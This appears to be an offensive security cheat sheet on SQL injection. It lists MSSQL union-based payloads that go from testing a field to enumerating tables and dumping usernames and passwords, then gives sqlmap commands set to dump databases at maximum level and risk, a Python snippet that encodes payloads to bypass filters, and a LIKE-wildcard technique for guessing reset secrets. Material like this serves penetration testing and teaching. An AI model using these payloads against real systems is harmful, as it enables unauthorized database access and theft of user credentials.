Skip to main content

SQL Injection

MSQL

Test

' or 1=1-- -

Identify number columns

Increase from 1 (column) ' order by 1-- - Until error or different content ' order by 7-- -

Confirm number columns

' union select 1,2,@@VERSION,DB_NAME(),5,6-- -

Get tables

' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -

Get columns from table Users

' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -

Dump data from table Users

' union select 1,2,username,password,4,5 FROM Users-- -

SQLMAP

Use file

sqlmap -r file.txt --batch --level 5 --risk 3

Post request

sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345"  --batch --dump --level 5 --risk 3

Bypass

Encoding payload using utf-16

user_input = input('> ').strip()
utf = [f"\\u00{ord(i):02x}" for i in user_input]
print(''.join(utf))

SQL "LIKE" Wildcard Injection

This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.

Types of Wildcards

  • %: Equivalent to any string of zero or more characters.
  • _: Equivalent to any single character.

Vulnerability

An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:

SELECT text FROM table WHERE secrets LIKE '$secret'

Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected: http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________

"_" are the chars that match the wildcard